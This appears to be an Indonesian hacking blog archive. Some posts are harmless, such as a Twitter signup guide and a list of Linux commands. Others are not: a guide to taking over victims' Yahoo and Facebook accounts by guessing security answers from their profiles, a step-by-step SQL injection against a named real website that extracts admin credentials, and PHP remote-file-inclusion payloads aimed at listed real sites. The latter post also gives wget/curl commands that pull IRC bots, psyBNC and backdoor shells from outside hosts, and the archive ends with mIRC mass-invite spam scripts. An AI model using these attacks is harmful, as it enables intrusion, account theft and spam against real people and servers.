Cara Mendaftar Twitter

Sebelum membuat atau mendaftar akun twitter ada baiknya kita sedikit mengenal tentang twitter. Twitter adalah suatu situs web jejaring sosial atau mikroblog dimana kita bisa memperbaharui/update status kita dengan karakter maksimum 140 karakter -kalo lebih? gak boleh! X( – Kita dapat mengupdate status kita dengan berbagai cara,yaitu cara manual (buka situs webnya), aplikasi twitter baik untuk handphone maupun dengan komputer/laptop, dan dengan SMS. Untuk layanan update status twitter lewat sms kini di Indonesia dapat dilakukan dengan menggunakan kartu AXIS.

Oke,cukup sedikit penjelasannya,tanpa buang waktu langsung aja kita ke TKPt (Tempat Kejadian Pembuatan twitter). Berikut ini adalah beberapa langkah untuk Membuat Akun Twitter atau Cara Mendaftar Twitter=

1. Buka www.twitter.com

Setelah kita membuka www.twitter.com langsung saja klik sign up now untuk membuat akun twitter atau mendaftar twitter.

2. Langkah kedua Mendaftar Twitter

Setelah anda mengklik sign up now, anda akan diminta mengisi formulir pendaftaran twitter.

1. Full name: Isikan nama anda

2. Username: Isikan dengan nama panggilan,nama sebutan,atau nama alias yang anda suka atau miliki.

3. Password: Silahkan diisi sesuai password yang dapat anda hafal. Disarankan dengan lebih dari 8 karakter dan gabungan antara huruf, angka atau berbagai karakter yang lain.

4. Email: isikan dengan alamat email yang anda punya. Diatas digunakan contoh gmail.com.

5. Tuliskan ulang huruf yang terdapat di kotak yang disediakan.

6. Jika 5 langkah diatas telah dikerjakan langsung klik create my account.

3. Langkah ketiga Cara Membuat Twitter

Anda diminta mengisi alamat email kembali dan menuliskan password email anda. Hal ini dilakukan agar twitter dapat langsng mengimport teman-teman anda yang mungkin sudah mendaftar di twitter. Sehingga anda tidak perlu repot-repot memfollow teman anda satu-satu.

4. Langkah keempat Membikin Twitter

Disini akan muncul beberapa teman anda yang sudah membuat twitter. Dan anda dapat memfollownya langsung. Namun anda juga dapat memilih mana teman yang akan anda follow atau tidak. Klik continue untuk melanjutkan ke langkah selanjutnya.

5. Langkah kelima buat twitter

Di langkah ke 5 cara membuat twitter anda akan di minta untuk mengajak teman-teman anda -yang ada di list email anda- bergabung dalam twitter. Disini anda juga dapat memilih teman yang akan anda ajak bergabung, mengajak semua teman, atau tidak mengajak teman anda. Setelah itu klik invite.

6. Buruan deh,lama banget….

Di sini anda dapat bisa memfollow orang-orang yang terkenal atau anda juga bisa langsung melewati step ini. Klik finish dan….

7. Akhirnya Akun Twitter jadi juga,huff…

Dan trraaarraa…anda sekarang memiliki akun twitter. ^^

Nah, demikianlah beberapa langkah membuat akun twitter/ mendaftar twitter. Semoga sedikit tulisan dan banyak gambar saya ini dapat membantu anda untuk membuat twitter. Dan akun twitter dapat anda gunakana secara manfaat baik dunia maupun akherat. Selamat berjelajah twitter.

Read the rest of this entry »

perintaH daSaR LinUX

cd x atau cd /x == masuk ke direktori x
cd .. atau cd ../ atau cd/.. == pindah ke direktori satu level di bawah
x lalu [tab] [tab] == berguna untuk mengetahui perintah apa saja yang tersedia yang berawalan huruf x
adduser == untuk menambahkan user baru
ls atau dir == untuk melihat isi suatu direktori
cat == untuk melihat isi dari suatu file text
mv x y == untuk memindahkan atau merename file x ke file y
cp x y == untuk mengkopi file x ke file y
rm x == untuk menghapus file x
mkdir x == untuk membuat direktori x
rmdir x == untuk menghapus direktori x
rm -r x == untuk menghapus direktori x beserta seluruh isinya
rm p == untuk menghapus paket tertentu
df atau df x == untuk mengetahui space kosong dalam device x
top == untuk mengetahui status memori (tekan q untuk quit)
man x == untuk mengetahui keterangan manual dari suatu perintah
less x == untuk melihat isi dari suatu file text
echo x == untuk mencetak isi dari suatu file x ke screen
mc == untuk menghidupkan Norton Commander dalam Linux (sangat berguna dan memudahkan bagi newbie)
mount == untuk menghidupkan suatu device spt cdrom
halt == untuk shutdown
reboot atau [ctl + alt + del] == untuk reboot


chmod == untuk mengubah permission suatu file
ls -l x == untuk melihat isi suatu direktori secara rinci
ln -s x y == untuk membuat link dari suatu file x ke file y
find x -name y -print == untuk menemukan file y, dengan mencari mulai dari direktori x dan tampilkan hasilnya pada layar
ps == untuk melihat seluruh proses yang sedang berjalan
kill x == untuk mematikan proses x (x adalah PID di dalam ps)
[alt] + F1 - F7 == untuk berpindah dari terminal 1 - 7 (ciri khas Linux)
lilo == untuk membuat boot disk


startx == untuk menjalankan X-Windows
[ctl] + [alt] + [backspace] == untuk keluar dari X-Windows jika terjadi trouble
[ctl] + [alt] + F1 - F6 == untuk pindah dari satu terminal ke terminal lain dalam X-Windows
xf86Config == untuk mengeset X (primitif) dalam text mode
Xconfigurator == sama seperti di atas

untuk lebih jelas klik disini
Label: Linux

Read the rest of this entry »

URL Dumper 1.6

URL Dumper adalah sebuah tool yang dapat menemukan bug XSS dan SQL Injection. Tool ini juga mendukung "multi search engine", "trash system", "pengelompokan database sqlite".

Fitur :
- Mendapatkan semua halaman
- XSS scanner (otomatis scan semua halaman link)
- SQLInjection Scanner (otomatis scan semua halaman link)
- Multi-Thread Engine
- Mendapatkan banyak link dari search engine seperti Google, Yahoo!, LiveSearch, Altavista, Terravista
- Mencari ke dalam source page
- Melihat Source Code
- Sistem Tray
- database dalam SQLite untuk dikelompokkan dalam URL
- Mendukung Proxy


Link Download :
Link 1
Link 2

Read the rest of this entry »

hindden folder taNpa SofTwaRe

"Sebenarnya trik ini bukan murni dari saya, tapi trik ini asalnya dari V.M.
Tapi dengan sedikit editan script dari saya.."

Selama ini untuk mengunci file di dalam folder kita perlu dengan bantuan software. Namun pernahkah anda berfikir untuk membuat penguncinya sendiri??

Berikut triknya :

1. Buka Notepad (START => All Program => Accessories => Notepad)
2. CopyPaste Script Berikut :

spyc0dz_BorneoCrew if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Yakin Mau dikunci ??(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Foldernya dah terkunci neh goto End :UNLOCK echo Eiitttzz!!! masukkan pasword dulu dunk..hehe set/p "pass=>" if NOT %pass%== naKuLa_ goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Foldernya berhasil di buat goto End :End

3. Save dengan nama terserah tapi akhirannya harus .bat (contoh : Kunci.bat)

Nah Cara menggunakannya tinggal klik 2 kali kunci.bat nanti akan muncul folder Locker . Setelah muncul taruh file-file kamu kedalam folder Locker,setelah itu klik lagi kunci.bat nya lagi

Mau buka???? Klik Aja lagi kunci.bat terus masukan password : naKuLa_

Read the rest of this entry »

Sandboxie

Sandboxie adalah suatu program 32-bit untuk sistem operasi berbasis NT-Windows yang menjalankan program anda di ruang isolasi yang dapat mencegah perubahan pada program lain dan data pada komputer Anda. Program ini dikembangkan oleh Ronen Tzur. Program ini menciptakan lingkungan operasi Box yang terisolasi di mana aplikasi dapat dijalankan atau diinstal tanpa memodifikasi secara permanen drive lokal atau dipetakan. Sebuah lingkungan virtual yang terisolasi memungkinkan untuk menguji program tak terpercaya dan menjelajah web.

Sandboxie menjalankan program Anda di ruang isolasi yang mencegah mereka membuat perubahan permanen ke program lain dan data di komputer Anda.

Kegunaan Sandboxie :

1. Secure Web Browsing: Menjalankan browser Web di bawah perlindungan Sandboxie berarti bahwa semua perangkat lunak berbahaya yang di download oleh browser akan terjebak dalam Sandbox dan dapat dibuang trivial.
2. Enhanced Privasi: Browsing history, cookies, cache dan file-file sementara yang dikumpulkan sewaktu browsing Web tinggal di Sandbox dan tidak bocor ke Windows.
3. Secure E-mail: Virus dan perangkat lunak berbahaya lainnya yang mungkin bersembunyi di email Anda tidak bisa keluar dari Sandbox dan tidak dapat menginfeksi sistem Anda yang sesungguhnya.
4. Windows Stays Lean: Mencegah terjadinya kerusakan di Windows dengan menginstal perangkat lunak ke dalam Box Isolasi Sandbox.
5. Mencegah perubahan pada kedua file Anda dan pengaturan registri, sehingga hampir mustahil untuk setiap perangkat lunak untuk mencapai di luar sandbox.
6. Perangkap item cache browser ke dalam Sandbox sebagai produk sampingan dari operasi normal, sehingga bila Anda membuang Sandbox, semua catatan sejarah dan lain efek samping browsing Anda juga hilang.


Link Download :
Link 1


sumber : http://www.sandboxie.com/

Read the rest of this entry »

email adalah Yang jalan utaMa masuk facebook

sebelumnya social engineering sebagai teknik dan seni mendapatkan informasi dari personal
dengan cara mengelabui tanpa perlu melakukan hal-hal yang biasa dilakukan seorang cracker. Ada pula
yang mengatakan sebagai psychological tricks terhadap orang yang memiliki hak akses pada suatu sistem
sebagai upaya untuk mengambil informasi yang dibutuhkan. Atau bisa dianggap sebagai seni
memanfaatkan kelemahan-kelemahan manusia seperti sikap tak acuh, naif atau keinginan natural manusia
yang ingin disukai orang lain.

daripada bengong saia coba menuliskan bagaimana take0ver facebook dengan memanfaatkan kelemahan user
lalu bagaimana caranya Tuan Muda????heee..sering dapat pertanyaan gitu saia.,baiklah.,.,.m0ga sajja dengan tulisan ini bisa terjawab.AMIN

yang pertama cari email target..usahakan yahoo dech..hihihi

lalu masuk ke yahoo truz klik I can't acces my account atau saya tidak dapat mengakses email saya
truz akan muncul pilihan masalah apa yang anda hadapi..yuhu.,.yahoo munk baik bgd yak.,.^_^

klik next sajjah lach.,lalu diminta memasukan email alternatif.,.wew.,.biLang az ga punya,,heee
s0 pilih yang bawah atau saia tidak dapat mengakses email alternatif saia juga.,hahahaha
nach..masukan email target tadi lalu masukan juga scurity c0dex..truz next lg...

wew,,,hehehee..ujian dimulai...ay0 jawab pertanyaan scurity dari target kita..hahay,,
ada bermacam pertanyaan yang di tawarkan yahoo..
apabila user menggunakan pertanyaan default dari yahoo maka hal ini bisa memudahkan kita dalam memasuki paksa emailx.,.
biasanya pertanyaan yang muncul
1. dimanakah anda berbulan madu???
berdasarkan hasiL survey & pengalaman rata-rata user menjawab
bali
lombok
jepang
venezuela
rumah
dirumah
dan lain-lain.,.hihihi...kal0 tetap gagaL bisa cek kota asal target kita di inf0 facebookx..coba az dimasukan biasanya berhasiL
2. tanggal lahir & k0de pos..???
ini lebih gampang lagi karena biasanya di inf0 facebookx user juga membiarkan tanggal lahir terlihat begitu sajja..heee
*lalu kede posx Tuan?????
itu bisa di atasi...buka az situs pos ind0nesia..hahahahhaaa.,.masukan kota target kL0 ada alamat rumahx.,.lebih gampang lg..hikz.,.nanti dikasih tw sm pak p0s onlinex
3. siapa nama belakang paman kesayangan anda???
mmmmmmmm,,,,yang ini kita mesti kerja ekstra chuy.,.hikz.,.coba az dekati target.,.lalu nanya-nanya gt dech.,.yg ujung2x mengarah pd pertanyaan yang kita butuhkan.,
4. apa nama hewan peliharaan anda???
coba buka f0to-ft0 target..kL0 munk dy jujur.,.biasax ada f0to binatang kesayanganx tuch.,.hihihi.,.tinggal cek2 sajjah......
5. apa nama sekolah dan lain..lain....

intinya kreative lach kita menjawab ujian yang di berikan yahoo tersebuk.,.ckckckck

anggap kita suda berhasil menjawab pertanyaan pertama dari yahoo scurity team.,.hahay.,.

akan ada pertanyaan ke dua.,.yang biasanya lebih gampang lagi.,.hihii

antara lain yang sering keluar
apanama merek motor / mobil pertama anda??
siapa nama pengarang favorit anda??
music fav0rit anda??
dimana anda bertemu pasangan anda?
dan lain sebagaix,.,

setelah berhasil melewati ujian kita akan diminta untuk memasukan password baru.,.

pada dasarnya smwa jawaban itu ada pada inf0 yang di berikan user di akun facebookx..


jadi kesimpulannya....email adalah kunci...kita & kelemahan user sering menganggap email hal yang gampang & menyepelekanx...
bahkan ada user yang tidak pernah sama sekali membuka emailx.,.jd y...pnya email cM buat bikin akun fabook sajjah .titik..
wew,,,parah........
orang-orang bginiLah yang biasanya menjadi k0rban.,.ckckckk
kl0 email korban sudah di tangan kita y...tinggal forgot password az kn di facebook...berezzz,,,


s0 jangan pernah menganggap sepeLe masaLah emaiL..^_

Read the rest of this entry »

SQL Injection for v5

== START ==
Code: http://www.fitnessthailand.co.th/activities_01.php?activity_id=31
Web diatas berjalan Normal
Wokeh skrg...qta Tambahkan penyedap rasa --> " - "
Code : http://www.fitnessthailand.co.th/activities_01.php?activity_id='31
Web Blank/kosong/Error berarti "Vuln Sql Injection"
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+1--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+2--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+3--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+4--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+5--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+6--
UpZz..Web Blank konten menjadi hilang/error lagi. Ini berarti kolom hanya ada 5 karena 6 tidak tersedia
NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterus'y. Hadooh Capek...ngaso dulu agh !!!



Setelah itu kita mengecek kolom yang bermasalah dengan perintah "union all select" atau "union select" seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--

Oh iya kita harus menambahkan tanda min " - " pada akhir id content seperti ini: "activity_id=-31"

Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :


Muncul angka 2 & 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.
Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Akan muncul versi dari MySQL yang dipakai seperti ini :



Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()" seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()
Akan muncul table-table seperti ini:



Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273

0x74626c5f7573657273 <--tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html

Kemudian column-column akan muncul seperti ini:



Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat([namakolom yang diinginkan],0x3a,[namakolom yang diinginkan])...+from+[nama tabel]-- seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+t ?bl_users--
Dan akan menampilkan isi dari kolom tersebut seperti ini :
Terakhir Tgl cari halaman admin'y.
halaman admin --> http://www.fitnessthailand.co.th/admin/

Read the rest of this entry »

Tutorial psy dan bot injekan kalian udah ga aneh kan chat di mirc...:D

kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :

1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server

cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf

cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt

cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run

1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run

ada juga cara yang lebih mudah injek php tutorial nya :

*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid

extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll

Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30

*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?

Sehingga target tersebut berubah menjadi:

http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.

Commands Yang Digunakan Di PHP Injection
========================================

*. Check Server

uname -a;id;uptime;wget;/sbin/ifconfig|grep inet

*. Bot dengan Netgate.tcl Untuk Allnetwork

cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]

*. Bot dengan RemajaBot di Allnet

cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt

find / -type d -perm 777

*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl

cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl

disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt

cd /dev/shm/bete;./eggdrop -m vian.txt

*.Membuat psyBNC port 31310

cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc

*.Membuat psyBNC dengan port dan ident tertentu

cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run

cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run

cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run

* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz

* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf

* Liat IP /sbin/ifconfig

*.BackDoor Session

++ telnet:1979

wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run


++ telnet 1666

cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin

++ linux shv4

cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)

COMMANDS CADANGAN
==================

*. Jika wget tidak berfungsi

gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz

*. Jika Dir tmp Tidak dapat Digunakan

gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm

*. Mencari Dir yang terbuka

gunakan find / -type d -perm 777

cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov

=====ala cempe ====

cari: ./phplivehelper/blank.php

./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?

mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd

masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd


===========

cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt


-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc

-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?

-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung

the oblivion
the loft
Niagara
grind


- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt

http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt


http://www.cantdeny.com/brokendestiny/protection.php?action=logout&siteurl


selamat mencoba nya yah kawan-kawan....
klo da kekurangan nya tulung di tambahin yah ma kawan-kawan yang sudah lebih mengerti dari saya...

script inviter

[ REMOTE ]
#ExpertInvite off
on 1:join:#: {
if ($nick == $me) { halt } | else { set %nick $nick | write Data/InviteList.txt %nick }
}
on 1:op:#: {
write -dw* $+ $opnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $opnick $+ _12) stoped! They were oped in (_1 $+ $chan $+ _12)
}
on 1:voice:#: {
write -dw* $+ $vnick $+ * Data/InviteList.txt
echo -s * __7I__12nvite to (_1 $+ $vnick $+ _12) stoped! They were voiced in (_1 $+ $chan $+ _12)
}
on 1:quit: {
if ($nick == me) { halt } | else { write -dl1 Data/InviteList.txt | echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They quit IRC }
write -dw* $+ $nick $+ * InviteList.txt
}
on 1:nick: {
write -dw* $+ $nick $+ * Data/InviteList.txt
write Data/InviteList.txt $newnick
echo -s * __7I__12nvite to (_1 $+ $nick $+ _12) stoped! They changed there nickname to (_1 $+ $newnick $+ _12)
}
raw 401:*: {
write -dw* $+ $2 $+ * Data/InviteList.txt
echo -a * __7E__12rror sending invite to (_1 $+ $2 $+ _12) aborting
}
#ExpertInvite end

[POPUP-menubar]
Expert
.Start Spy:/enable #ExpertInvite
.Stop Spy:/disable #ExpertInvite

Berikut ini script pada mIRC 2 yang bertugas sebagai Inviter.
[REMOTE]
on 1:START: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]
on 1:CONNECT: titlebar .:: MadCodes Script ::. OnLine [[ %InvitedPeople people invited ]]
on 1:DISCONNECT: titlebar .:: MadCodes Script ::. OffLine [[ %InvitedPeople people invited ]]

[POPUP-menubar]
Start Invite:/StartInvite
Stop Invite:/timerInvite off
-
Set Message:/set %ExpertInviter.Message $$?=”Message”

[ALIASES]
/StartInvite /timerInvite 0 5 /gabung
/gabung /set %invite $read -l1 ../Data/InviteList.txt | msg %invite %ExpertInviter.Message | inc %InvitedPeople | write -dl1 ../Data/InviteList.txt

2. Advanced Inviter

Tipe inviter satu ini hampir mirip dengan xGuest, tetapi kelebihan yang satu ini adalah OpenSource dan langsung di mIRC hehehe. Jadi dapat lu kembangkan menjadi lebih baik.

Save script dibawah dengan nama massinviteoke.mrc di folder mIRC, lalu load file tersebut dari mIRC.

Credit: Script untuk Advanced Inviter (massinviteoke.mrc) bukan buatan saya (CyberMad), saya hanya menulis ulang disini. Sangat disayangkan… saya tidak mengetahui nama pembuat aslinya.

on 1:LOAD:/auser me $me
alias tanya {
if ( %tc == $null ) { set %tc $chan }
if ( %server = $null ) { /set %server $$?=”enter SERVER” }
if ( %msg != $null ) goto msg1
:msg
/set %msg $$?=” enter message”
:msg1
//echo -a 5This is your message: %msg
/set %msgok $$?=”Message okay? Y/N”
if ( %msgok == N ) { goto msg | halt }
/undang
/unset %msgok
}
alias undang {
set %tp $nopnick(%tc,0)
set %pn 1
:begin
set %p $nopnick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
alias pesan {
:mulai
inc %cunt1
if ( %cunt > %tp ) { .remove penghuni.txt | unset %tc | unset %tp | unset %pn | unset %p | unset %pn1 | unset %cunt | unset %cunt1 | /echo -s DONE! | /quit | halt }
set %p $read -l $+ %cunt penghuni.txt
set %FILTER3 $addtok(%FILTER3,%p,44)
if ($gettok(%FILTER3,0,44) == 4) { .msg $gettok(%FILTER3,1-4,44) %msg | unset %FILTER3 }
/echo -s 12 Msg sent to 4 $read -l $+ %cunt penghuni.txt 1 at 3 %tc 6 %cunt of %tp
inc %cunt
if ( %cunt1 == 51 ) { /timer 1 2 /unset %cunt1 | /timer 1 5 /quit leaving | /timer 1 7 /server %server | halt }
goto mulai
}
raw 401:*: { halt }
raw 403:*: { halt }
on 1:CONNECT: {
if ( %cunt == $null ) { halt }
/pesan
}
menu menubar {
<<>>
-
Join a channel (invite from this channel): /set %tc $$?=”Enter channel invite from” | /join %tc
-
Start Mass-invite: /tanya
-
End Mass-invite / Reset: /disconnect | unset %tc %tp %pn %p %cunt* | remove penghuni.txt
}

on me:JOIN:#: set %tc $chan
alias undangall {
set %tp $nick(%tc,0)
set %pn 1
:begin
set %p $nick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
